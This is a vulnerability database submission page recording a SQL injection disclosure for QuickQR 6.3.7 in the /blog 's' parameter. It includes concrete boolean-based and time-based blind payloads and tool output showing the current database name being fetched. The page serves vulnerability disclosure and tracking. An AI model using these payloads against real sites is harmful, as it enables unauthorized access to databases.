Submit #179269: QuickQR 6.3.7 - SQL Injectioninfo

TitelQuickQR 6.3.7 - SQL Injection
Beschreibung# Exploit Title: QuickQR 6.3.7 - SQL Injection # Date: 07/07/2023 # Exploit Author: skalvin aka (CraCkEr) # Vendor: bylancer # Vendor Homepage: https://bylancer.com/ # Software Link: https://quickqr.by-code.com/ # Version: 6.3.7 # Tested on: Windows 10 Pro # Impact: Database Access Release Notes: SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /blog https://website/blog?s=[SQLI] GET parameter 's' is vulnerable to SQL Injection --- Parameter: s (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: s=123') OR 05923=5923 OR ('04586'='4586 Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (IF - comment) Payload: s=123'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z --- [+] Starting the Attack fetching current database current database: 'quickqrmenu_**' [-] Done
Benutzer
 skalvin (UID 49463)
Einreichung07.07.2023 20:35 (vor 3 Jahren)
Moderieren15.07.2023 18:26 (8 days later)
StatusAkzeptiert
VulDB Eintrag234235 [Bylancer QuickQR 6.3.7 GET Parameter /blog s SQL Injection]
Punkte17

ZurückÜbersichtWeiter

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!